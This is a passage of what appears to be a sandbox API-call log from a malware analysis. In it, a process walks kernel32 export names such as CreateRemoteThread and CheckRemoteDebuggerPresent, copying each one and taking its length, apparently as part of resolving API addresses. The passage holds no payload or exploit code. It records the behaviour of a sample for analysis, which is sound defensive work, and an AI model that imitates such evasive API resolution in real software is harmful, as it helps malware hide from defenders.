lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.714] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.714] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.714] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.714] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.714] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.714] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.714] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.714] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.714] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0079.714] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0079.714] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0079.714] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0079.715] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0079.715] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0079.715] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0079.715] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.715] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.715] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.715] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.715] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.715] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.715] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.715] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.715] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.715] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.715] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.715] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.715] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.715] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.715] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.715] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.715] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.716] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.716] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.716] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.716] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.716] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.716] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.716] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.716] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.716] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.716] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.716] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.716] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.716] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.716] lstrlenA (lpString="COPYFILEA") returned 9 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.716] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.716] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.716] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.716] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.716] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.717] lstrlenA (lpString="COPYFILEW") returned 9 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.717] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.717] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.717] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.717] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.717] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.717] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.717] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.717] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.717] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.717] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.717] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.717] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.717] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.717] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.717] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.717] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.717] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.717] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.718] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.718] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.718] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.718] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.718] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.718] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.718] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.718] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.718] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.718] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.718] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.718] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.718] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.718] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.718] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.718] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.718] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.718] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.718] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.718] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.719] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.719] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.719] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.719] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.719] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.719] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.719] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.719] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.719] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.719] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.719] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.719] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.719] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.719] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.719] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.719] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.719] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.719] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.719] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.720] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.720] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.720] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.720] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.720] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.720] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.720] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.720] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.720] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.720] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.720] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.720] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.720] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.720] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.720] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.720] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.720] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.720] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.720] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.721] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.721] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.721] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.721] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.721] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.721] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") 